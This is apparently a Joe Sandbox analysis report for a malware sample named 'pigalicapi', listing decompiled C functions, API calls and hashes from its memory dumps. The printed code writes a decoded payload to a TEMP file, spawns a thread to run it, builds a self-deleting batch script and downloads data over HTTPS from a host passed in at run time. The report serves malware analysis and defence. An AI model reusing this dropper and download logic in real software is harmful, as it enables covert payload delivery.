                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                          • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                          • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				long _v608;
                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                          				long _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				long _v624;
                                                                                                                                                                                                                                                                          				intOrPtr _v628;
                                                                                                                                                                                                                                                                          				void* _v632;
                                                                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                          				void* _t347;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				void* _t350;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v32 =  *_v8;
                                                                                                                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                          				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                          				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                          					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v608 = 0;
                                                                                                                                                                                                                                                                          						_v612 = 0;
                                                                                                                                                                                                                                                                          						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v620 != 0) {
                                                                                                                                                                                                                                                                          								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                          									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                          									_v616 = _v624;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CloseHandle(_v328);
                                                                                                                                                                                                                                                                          						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                          							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                          							_v628 = _t198;
                                                                                                                                                                                                                                                                          							if(_v628 != 0) {
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                          					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          					_v40 = _t217;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          					if(_v48 != 0) {
                                                                                                                                                                                                                                                                          						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                          							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                          							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          							_v40 = _t248;
                                                                                                                                                                                                                                                                          							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_v40 == 0) {
                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          						_v632 = _t223;
                                                                                                                                                                                                                                                                          						_v52 = _v632;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                          							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_v52 = _v36;
                                                                                                                                                                                                                                                                          							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                          							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v56);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                          0x04006dac
                                                                                                                                                                                                                                                                          0x04006db3
                                                                                                                                                                                                                                                                          0x0400723f
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04006dc9
                                                                                                                                                                                                                                                                          0x04006dd1
                                                                                                                                                                                                                                                                          0x04006ddc
                                                                                                                                                                                                                                                                          0x04006de5
                                                                                                                                                                                                                                                                          0x04006dee
                                                                                                                                                                                                                                                                          0x04006df7
                                                                                                                                                                                                                                                                          0x04006e00
                                                                                                                                                                                                                                                                          0x04006e09
                                                                                                                                                                                                                                                                          0x04006e15
                                                                                                                                                                                                                                                                          0x04007028
                                                                                                                                                                                                                                                                          0x04007039
                                                                                                                                                                                                                                                                          0x0400704a
                                                                                                                                                                                                                                                                          0x0400704f
                                                                                                                                                                                                                                                                          0x04007077
                                                                                                                                                                                                                                                                          0x04007099
                                                                                                                                                                                                                                                                          0x040070a6
                                                                                                                                                                                                                                                                          0x040070ac
                                                                                                                                                                                                                                                                          0x040070b6
                                                                                                                                                                                                                                                                          0x040070c6
                                                                                                                                                                                                                                                                          0x040070d5
                                                                                                                                                                                                                                                                          0x040071af
                                                                                                                                                                                                                                                                          0x040070db
                                                                                                                                                                                                                                                                          0x040070eb
                                                                                                                                                                                                                                                                          0x04007107
                                                                                                                                                                                                                                                                          0x04007114
                                                                                                                                                                                                                                                                          0x0400713d
                                                                                                                                                                                                                                                                          0x04007163
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007189
                                                                                                                                                                                                                                                                          0x040071bc
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x040071e0
                                                                                                                                                                                                                                                                          0x040071e5
                                                                                                                                                                                                                                                                          0x040071e8
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071fe
                                                                                                                                                                                                                                                                          0x04007212
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x04007231
                                                                                                                                                                                                                                                                          0x04007236
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04006e1b
                                                                                                                                                                                                                                                                          0x04006e22
                                                                                                                                                                                                                                                                          0x04006e29
                                                                                                                                                                                                                                                                          0x04006e39
                                                                                                                                                                                                                                                                          0x04006eec
                                                                                                                                                                                                                                                                          0x04006ef1
                                                                                                                                                                                                                                                                          0x04006ef4
                                                                                                                                                                                                                                                                          0x04006e3f
                                                                                                                                                                                                                                                                          0x04006e4f
                                                                                                                                                                                                                                                                          0x04006e65
                                                                                                                                                                                                                                                                          0x04006e6c
                                                                                                                                                                                                                                                                          0x04006e8c
                                                                                                                                                                                                                                                                          0x04006e92
                                                                                                                                                                                                                                                                          0x04006e97
                                                                                                                                                                                                                                                                          0x04006e9a
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006ebb
                                                                                                                                                                                                                                                                          0x04006eca
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006ee3
                                                                                                                                                                                                                                                                          0x04006efb
                                                                                                                                                                                                                                                                          0x04007012
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006f01
                                                                                                                                                                                                                                                                          0x04006f08
                                                                                                                                                                                                                                                                          0x04006f1c
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f2d
                                                                                                                                                                                                                                                                          0x04006f35
                                                                                                                                                                                                                                                                          0x04006f3a
                                                                                                                                                                                                                                                                          0x04006f3d
                                                                                                                                                                                                                                                                          0x04006f49
                                                                                                                                                                                                                                                                          0x04006f55
                                                                                                                                                                                                                                                                          0x04006f83
                                                                                                                                                                                                                                                                          0x04006f8b
                                                                                                                                                                                                                                                                          0x04006fa1
                                                                                                                                                                                                                                                                          0x04006fa6
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006f57
                                                                                                                                                                                                                                                                          0x04006f5d
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fc6
                                                                                                                                                                                                                                                                          0x04006fcf
                                                                                                                                                                                                                                                                          0x04006fe9
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fff
                                                                                                                                                                                                                                                                          0x0400700a
                                                                                                                                                                                                                                                                          0x0400700f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006fff

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                          • Opcode ID: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				void _v296;
                                                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                                                          				long _v304;
                                                                                                                                                                                                                                                                          				long _v308;
                                                                                                                                                                                                                                                                          				char* _t54;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                          					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                                                                                          							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                          								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                          								_v24 = 4;
                                                                                                                                                                                                                                                                          								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                          								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                          								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                          								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                          									_v308 = GetLastError();
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                          									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                          										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                          											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                          											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 = _v300;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04002909
                                                                                                                                                                                                                                                                          0x04002914
                                                                                                                                                                                                                                                                          0x04002936
                                                                                                                                                                                                                                                                          0x04002942
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002972
                                                                                                                                                                                                                                                                          0x04002979
                                                                                                                                                                                                                                                                          0x040029a3
                                                                                                                                                                                                                                                                          0x040029aa
                                                                                                                                                                                                                                                                          0x040029c0
                                                                                                                                                                                                                                                                          0x040029c9
                                                                                                                                                                                                                                                                          0x040029d0
                                                                                                                                                                                                                                                                          0x040029e8
                                                                                                                                                                                                                                                                          0x040029f9
                                                                                                                                                                                                                                                                          0x04002a0e
                                                                                                                                                                                                                                                                          0x04002a33
                                                                                                                                                                                                                                                                          0x04002ab5
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a3f
                                                                                                                                                                                                                                                                          0x04002a4a
                                                                                                                                                                                                                                                                          0x04002a73
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002a90
                                                                                                                                                                                                                                                                          0x04002a9f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002aeb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                          • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                          • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                          • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
